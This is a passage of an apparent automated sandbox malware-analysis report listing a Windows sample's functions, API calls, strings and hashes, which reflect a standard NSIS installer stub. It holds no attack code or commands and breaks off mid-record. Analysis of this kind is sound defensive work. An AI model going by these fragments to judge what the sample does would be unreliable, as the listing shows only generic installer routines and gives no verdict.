                                                  • DeleteObject.GDI32(?), ref: 004010ED
                                                  • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                  • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                                  • DrawTextA.USER32(00000000,00423F20,000000FF,00000010,00000820), ref: 00401156
                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                  • DeleteObject.GDI32(?), ref: 00401165
                                                  • EndPaint.USER32(?,?), ref: 0040116E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4133949495.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.4133924200.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4133990934.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4134017973.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4134048992.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                  • String ID: F
                                                  • API String ID: 941294808-1304234792
                                                  • Opcode ID: 70a1a6841c1126847f7f0a67fc0902e6e1e74352a81e7501bbba8acc6fe4905f
                                                  • Instruction ID: 2cfb6452d3ed2adb0490a6fda74b90e1dfbf7fcab0fd01839bab840ee2ffb3d6
                                                  • Opcode Fuzzy Hash: 70a1a6841c1126847f7f0a67fc0902e6e1e74352a81e7501bbba8acc6fe4905f
                                                  • Instruction Fuzzy Hash: 07418D71400209AFCB058F95DE459AF7BB9FF45315F00802EF5A1AA1A0C7349955DFA4
                                                  APIs
                                                  • GetDlgItem.USER32(?,000003FB), ref: 004046B0
                                                  • SetWindowTextA.USER32(00000000,?), ref: 004046DA
                                                  • SHBrowseForFolderA.SHELL32(?,00420108,?), ref: 0040478B
                                                  • CoTaskMemFree.OLE32(00000000), ref: 00404796
                                                  • lstrcmpiA.KERNEL32(004236C0,00420D30), ref: 004047C8
                                                  • lstrcatA.KERNEL32(?,004236C0), ref: 004047D4
                                                  • SetDlgItemTextA.USER32(?,000003FB,?), ref: 004047E6
                                                    • Part of subcall function 00405841: GetDlgItemTextA.USER32(?,?,00000400,0040481D), ref: 00405854
                                                    • Part of subcall function 004063AB: CharNextA.USER32(?,*?|<>/":,00000000,0042A000,74DF3410,0042B400,00000000,0040335F,0042B400,0042B400,00403596,?,00000006,00000008,0000000A), ref: 00406403
                                                    • Part of subcall function 004063AB: CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406410
                                                    • Part of subcall function 004063AB: CharNextA.USER32(?,0042A000,74DF3410,0042B400,00000000,0040335F,0042B400,0042B400,00403596,?,00000006,00000008,0000000A), ref: 00406415
                                                    • Part of subcall function 004063AB: CharPrevA.USER32(?,?,74DF3410,0042B400,00000000,0040335F,0042B400,0042B400,00403596,?,00000006,00000008,0000000A), ref: 00406425
                                                  • GetDiskFreeSpaceA.KERNEL32(0041FD00,?,?,0000040F,?,0041FD00,0041FD00,?,00000001,0041FD00,?,?,000003FB,?), ref: 004048A4
                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004048BF
                                                    • Part of subcall function 00404A18: lstrlenA.KERNEL32(00420D30,00420D30,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404933,000000DF,00000000,00000400,?), ref: 00404AB6
                                                    • Part of subcall function 00404A18: wsprintfA.USER32 ref: 00404ABE
                                                    • Part of subcall function 00404A18: SetDlgItemTextA.USER32(?,00420D30), ref: 00404AD1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4133949495.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.4133924200.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4133990934.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4134017973.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4134048992.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                  • String ID: 0B$A
                                                  • API String ID: 2624150263-373579336
                                                  • Opcode ID: ee346185362cf3791e06a9f3fa2f25786f97bfbeb7d2d70098bc45d35eaf17e7
                                                  • Instruction ID: 834555d72061076239680e6a84f3316086c58123263e9301e374821f8ce8aa56
                                                  • Opcode Fuzzy Hash: ee346185362cf3791e06a9f3fa2f25786f97bfbeb7d2d70098bc45d35eaf17e7
                                                  • Instruction Fuzzy Hash: 5FA150F1900209ABDB11AFA5CD85AAFB7B8EF84314F10843BF611B62D1D77C99418B6D
                                                  APIs
                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00405F41,?,?), ref: 00405DE1
                                                  • GetShortPathNameA.KERNEL32(?,00422AC0,00000400), ref: 00405DEA
                                                    • Part of subcall function 00405C3F: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E9A,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C4F
                                                    • Part of subcall function 00405C3F: lstrlenA.KERNEL32(00000000,?,00000000,00405E9A,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C81
                                                  • GetShortPathNameA.KERNEL32(?,00422EC0,00000400), ref: 00405E07
                                                  • wsprintfA.USER32 ref: 00405E25
                                                  • GetFileSize.KERNEL32(00000000,00000000,00422EC0,C0000000,00000004,00422EC0,?,?,?,?,?), ref: 00405E60
                                                  • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E6F
                                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405EA7
                                                  • SetFilePointer.KERNEL32(0040A3D0,00000000,00000000,00000000,00000000,004226C0,00000000,-0000000A,0040A3D0,00000000,[Rename],00000000,00000000,00000000), ref: 00405EFD
                                                  • GlobalFree.KERNEL32(00000000), ref: 00405F0E
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405F15
                                                    • Part of subcall function 00405CDA: GetFileAttributesA.KERNEL32(00000003,00402E57,0042BC00,80000000,00000003), ref: 00405CDE
                                                    • Part of subcall function 00405CDA: CreateFileA.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405D00
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4133949495.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.4133924200.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4133990934.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4134017973.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4134048992.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                  • String ID: %s=%s$[Rename]
                                                  • API String ID: 2171350718-1727408572
                                                  • Opcode ID: ea34b8269daeb14a3879d28dfee10c2595801ce7354f6ad27735141817cde965
                                                  • Instruction ID: 443431a376db42b7d779c0f12c1ecf66d6c3f5619bcb6008fb44dfcbbf8babb0
                                                  • Opcode Fuzzy Hash: ea34b8269daeb14a3879d28dfee10c2595801ce7354f6ad27735141817cde965
                                                  • Instruction Fuzzy Hash: B5312631204B15BBD2207B65AE49F6B3A5CDF81714F14043BF942F62D2DA7CD9028ABD
                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 00402E28
                                                  • GetModuleFileNameA.KERNEL32(00000000,0042BC00,00000400), ref: 00402E44
                                                    • Part of subcall function 00405CDA: GetFileAttributesA.KERNEL32(00000003,00402E57,0042BC00,80000000,00000003), ref: 00405CDE
                                                    • Part of subcall function 00405CDA: CreateFileA.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405D00
                                                  • GetFileSize.KERNEL32(00000000,00000000,0042C000,00000000,0042AC00,0042AC00,0042BC00,0042BC00,80000000,00000003), ref: 00402E8D
                                                  • GlobalAlloc.KERNEL32(00000040,0040A130), ref: 00402FCF
                                                  Strings
                                                  • Inst, xrefs: 00402EF9
                                                  • soft, xrefs: 00402F02
                                                  • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00403018
                                                  • Error launching installer, xrefs: 00402E64
                                                  • Null, xrefs: 00402F0B
                                                  • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00403066
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4133949495.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.4133924200.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4133990934.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4134017973.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4134048992.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                  • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                  • API String ID: 2803837635-3016655952
                                                  • Opcode ID: b8ae4ea4567667b822b1a028ef7342e4c5664cf843c5f151ac0204ae6ee5b6ea
                                                  • Instruction ID: 15cfe338c172b2f14672f474af97282dc626767e8c2a942c813fbe846372f848
                                                  • Opcode Fuzzy Hash: b8ae4ea4567667b822b1a028ef7342e4c5664cf843c5f151ac0204ae6ee5b6ea
                                                  • Instruction Fuzzy Hash: C271B271A00208ABDB20EF74ED89BAE7BB8EB44355F51403BE910B62D1D77C9E418B5C
                                                  APIs
                                                  • GetSystemDirectoryA.KERNEL32(004236C0,00000400), ref: 0040628E
                                                  • GetWindowsDirectoryA.KERNEL32(004236C0,00000400,?,00420510,00000000,004052A0,00420510,00000000), ref: 004062A1
                                                  • SHGetSpecialFolderLocation.SHELL32(004052A0,00000000,?,00420510,00000000,004052A0,00420510,00000000), ref: 004062DD
                                                  • SHGetPathFromIDListA.SHELL32(00000000,004236C0), ref: 004062EB
                                                  • CoTaskMemFree.OLE32(00000000), ref: 004062F7
                                                  • lstrcatA.KERNEL32(004236C0,\Microsoft\Internet Explorer\Quick Launch), ref: 0040631B
                                                  • lstrlenA.KERNEL32(004236C0,?,00420510,00000000,004052A0,00420510,00000000,00000000,00000000,00000000), ref: 0040636D
                                                  Strings
                                                  • Software\Microsoft\Windows\CurrentVersion, xrefs: 0040625D
                                                  • \Microsoft\Internet Explorer\Quick Launch, xrefs: 00406315
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4133949495.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.4133924200.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4133990934.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4134017973.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4134048992.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                  • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                  • API String ID: 717251189-730719616
                                                  • Opcode ID: 55d0e0849926790f3b2beeac2145b556fefee7c74e7047295da2d752dda0aa13
                                                  • Instruction ID: 216e8927814ca7a9437579cdf690648b6b4dd304440a75ce87bcc4b513c9caea
                                                  • Opcode Fuzzy Hash: 55d0e0849926790f3b2beeac2145b556fefee7c74e7047295da2d752dda0aa13
                                                  • Instruction Fuzzy Hash: B661F431900215AEDF209F24D8917BE3BA4AB46314F52413FED53B62D1C73C4966CB8E
                                                  APIs
                                                  • GetWindowLongA.USER32(?,000000EB), ref: 00404253
                                                  • GetSysColor.USER32(00000000), ref: 00404291
                                                  • SetTextColor.GDI32(?,00000000), ref: 0040429D
                                                  • SetBkMode.GDI32(?,?), ref: 004042A9
                                                  • GetSysColor.USER32(?), ref: 004042BC
                                                  • SetBkColor.GDI32(?,?), ref: 004042CC
                                                  • DeleteObject.GDI32(?), ref: 004042E6
                                                  • CreateBrushIndirect.GDI32(?), ref: 004042F0
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4133949495.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.4133924200.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4133990934.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4134017973.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4134048992.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                  • String ID:
                                                  • API String ID: 2320649405-0
                                                  • Opcode ID: 2fd397ab70c88e7053abfa2b1889d7e6adf273714bf8f91ffd366fbe1d5efa4b
                                                  • Instruction ID: 8c367e47b4306476cf29da68a02135d76106e82033ebf96affcab25eba3a867f
                                                  • Opcode Fuzzy Hash: 2fd397ab70c88e7053abfa2b1889d7e6adf273714bf8f91ffd366fbe1d5efa4b
                                                  • Instruction Fuzzy Hash: 362195716007049BCB319F68D948B5BBBF8AF41750B04897EFE96A26E0C734D944CB64
                                                  APIs
                                                  • lstrlenA.KERNEL32(00420510,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402DEC,00000000,?), ref: 004052A1
                                                  • lstrlenA.KERNEL32(00402DEC,00420510,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402DEC,00000000), ref: 004052B1
                                                  • lstrcatA.KERNEL32(00420510,00402DEC,00402DEC,00420510,00000000,00000000,00000000), ref: 004052C4
                                                  • SetWindowTextA.USER32(00420510,00420510), ref: 004052D6
                                                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052FC
                                                  • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405316
                                                  • SendMessageA.USER32(?,00001013,?,00000000), ref: 00405324
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4133949495.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.4133924200.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4133990934.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4134017973.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4134048992.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                  • String ID:
                                                  • API String ID: 2531174081-0
                                                  • Opcode ID: 2d50aaf80812c9820dc98849908b30421a007c8f928f616371a5a969bb93c1b7
                                                  • Instruction ID: 33e4e25cccf7abea72a497d718f2df9cdca22d62bd402c63bdf8694765fb3fc0
                                                  • Opcode Fuzzy Hash: 2d50aaf80812c9820dc98849908b30421a007c8f928f616371a5a969bb93c1b7
                                                  • Instruction Fuzzy Hash: 7A219A71900508BACB119FA5DD81A9EBFB9EF04354F00807AF944B6291C7B98A80CFA8
                                                  APIs
                                                  • DestroyWindow.USER32(?,00000000), ref: 00402D8D
                                                  • GetTickCount.KERNEL32 ref: 00402DAB
                                                  • wsprintfA.USER32 ref: 00402DD9
                                                    • Part of subcall function 00405268: lstrlenA.KERNEL32(00420510,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402DEC,00000000,?), ref: 004052A1
                                                    • Part of subcall function 00405268: lstrlenA.KERNEL32(00402DEC,00420510,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402DEC,00000000), ref: 004052B1
                                                    • Part of subcall function 00405268: lstrcatA.KERNEL32(00420510,00402DEC,00402DEC,00420510,00000000,00000000,00000000), ref: 004052C4
                                                    • Part of subcall function 00405268: SetWindowTextA.USER32(00420510,00420510), ref: 004052D6
                                                    • Part of subcall function 00405268: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052FC
                                                    • Part of subcall function 00405268: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405316
                                                    • Part of subcall function 00405268: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405324
                                                  • CreateDialogParamA.USER32(0000006F,00000000,00402CDD,00000000), ref: 00402DFD
                                                  • ShowWindow.USER32(00000000,00000005), ref: 00402E0B
                                                    • Part of subcall function 00402D59: MulDiv.KERNEL32(?,00000064,?), ref: 00402D6E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4133949495.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.4133924200.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4133990934.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4134017973.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4134048992.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                  • String ID: ... %d%%
                                                  • API String ID: 722711167-2449383134
                                                  • Opcode ID: 71326f4564a129bc2a25da416bfdb14f43ef231ad407c7c8c263862d40927e90
                                                  • Instruction ID: b553f58f662a8d3b5c132dd9eb473e82ace801a4c3d7fb7af48dab40205e53c4
                                                  • Opcode Fuzzy Hash: 71326f4564a129bc2a25da416bfdb14f43ef231ad407c7c8c263862d40927e90
                                                  • Instruction Fuzzy Hash: EC01C430501624EBCB21AB60EF0CEDE77A8EB80705B04013BF905B51E1DBB848568AED
                                                  APIs
                                                  • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404B3D
                                                  • GetMessagePos.USER32 ref: 00404B45
                                                  • ScreenToClient.USER32(?,?), ref: 00404B5F
                                                  • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404B71
                                                  • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404B97
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4133949495.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.4133924200.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4133990934.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4134017973.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4134048992.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: Message$Send$ClientScreen
                                                  • String ID: f
                                                  • API String ID: 41195575-1993550816
                                                  • Opcode ID: b233b2991907e98a40282691d164461162982266b543cde43f51771bab81e11a
                                                  • Instruction ID: 39453513f114f2a688c797cc76a53a354442de9c6c07e73bdd5afe949bfa8100
                                                  • Opcode Fuzzy Hash: b233b2991907e98a40282691d164461162982266b543cde43f51771bab81e11a
                                                  • Instruction Fuzzy Hash: 1A015E75D00218BAEB00DB94DD85FFEBBBCAF55711F10412BBA50F61D0C7B4A9458BA4
                                                  APIs
                                                  • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00406482
                                                  • wsprintfA.USER32 ref: 004064BB
                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000008), ref: 004064CF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4133949495.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.4133924200.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4133990934.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4134017973.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4134048992.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: DirectoryLibraryLoadSystemwsprintf
                                                  • String ID: %s%s.dll$UXTHEME$\
                                                  • API String ID: 2200240437-4240819195
                                                  • Opcode ID: e24acbe6227527768190d78db3c852bebda673ce15d2d0c5597dd6d7ee2660dd
                                                  • Instruction ID: c390764595a0a4e8c5ef638620d3c4371d91d6a13df4ef9e5d2f3a730445ac55
                                                  • Opcode Fuzzy Hash: e24acbe6227527768190d78db3c852bebda673ce15d2d0c5597dd6d7ee2660dd
                                                  • Instruction Fuzzy Hash: 5DF0F63050061A6BDF149B64DD0DFFB365CAF08305F14047AAA86E20C1EABCD9258B5D
                                                  APIs
                                                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402CF8
                                                  • wsprintfA.USER32 ref: 00402D2C
                                                  • SetWindowTextA.USER32(?,?), ref: 00402D3C
                                                  • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402D4E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4133949495.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.4133924200.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4133990934.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4134017973.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4134048992.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                  • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                  • API String ID: 1451636040-1158693248
                                                  • Opcode ID: c25539744540cbbb9a571437eca3a60936911fc1bfeb79ef91e14ebf2a0af94a
                                                  • Instruction ID: d8b1f7c19252c76547d0ac26773f92b51ee34845b2b999cc677ac46ee6bff0cf
                                                  • Opcode Fuzzy Hash: c25539744540cbbb9a571437eca3a60936911fc1bfeb79ef91e14ebf2a0af94a
                                                  • Instruction Fuzzy Hash: 75F01D7150020DABEF206F50DE1ABAE3669EB04345F00803AFA06B51D0DBB89D568B99
                                                  APIs
                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004027F7
                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 00402813
                                                  • GlobalFree.KERNEL32(?), ref: 0040284C
                                                  • GlobalFree.KERNEL32(00000000), ref: 0040285F
                                                  • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 00402877
                                                  • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040288B
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4133949495.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.4133924200.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4133990934.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4134017973.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4134048992.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                  • String ID:
                                                  • API String ID: 2667972263-0
                                                  • Opcode ID: 96695c404a829781fd9be7667be0c963bc8871e5b1670740abd5a7ef253750dd
                                                  • Instruction ID: 81d5057223690197c1e699a61141c161be386b669f751160d25d8bfdf59f5f06
                                                  • Opcode Fuzzy Hash: 96695c404a829781fd9be7667be0c963bc8871e5b1670740abd5a7ef253750dd
                                                  • Instruction Fuzzy Hash: 17214A72C00224ABDF217FA58D49DAE7F79EF05364B10823AF520762E1CB7949428F98
                                                  APIs
                                                  • lstrlenA.KERNEL32(00420D30,00420D30,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404933,000000DF,00000000,00000400,?), ref: 00404AB6
                                                  • wsprintfA.USER32 ref: 00404ABE
                                                  • SetDlgItemTextA.USER32(?,00420D30), ref: 00404AD1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4133949495.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.4133924200.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4133990934.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4134017973.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4134048992.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: ItemTextlstrlenwsprintf
                                                  • String ID: %u.%u%s%s$0B
                                                  • API String ID: 3540041739-2032437577
                                                  • Opcode ID: 773d23f090e8bb878499c5f5a9f1f4fae98b1c8909eb46a18e62ff3655c09282
                                                  • Instruction ID: 283b724f563733faa375caf007583819479a8bdae971eeac84f96503b42fc0b0
                                                  • Opcode Fuzzy Hash: 773d23f090e8bb878499c5f5a9f1f4fae98b1c8909eb46a18e62ff3655c09282
                                                  • Instruction Fuzzy Hash: B311E777A0412437DB0065B99C42EAF329CDB85334F250237FA26F61D1E9788C1286AC
                                                  APIs
                                                  • CharNextA.USER32(?,*?|<>/":,00000000,0042A000,74DF3410,0042B400,00000000,0040335F,0042B400,0042B400,00403596,?,00000006,00000008,0000000A), ref: 00406403
                                                  • CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406410
                                                  • CharNextA.USER32(?,0042A000,74DF3410,0042B400,00000000,0040335F,0042B400,0042B400,00403596,?,00000006,00000008,0000000A), ref: 00406415
                                                  • CharPrevA.USER32(?,?,74DF3410,0042B400,00000000,0040335F,0042B400,0042B400,00403596,?,00000006,00000008,0000000A), ref: 00406425
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4133949495.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.4133924200.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4133990934.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4134017973.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
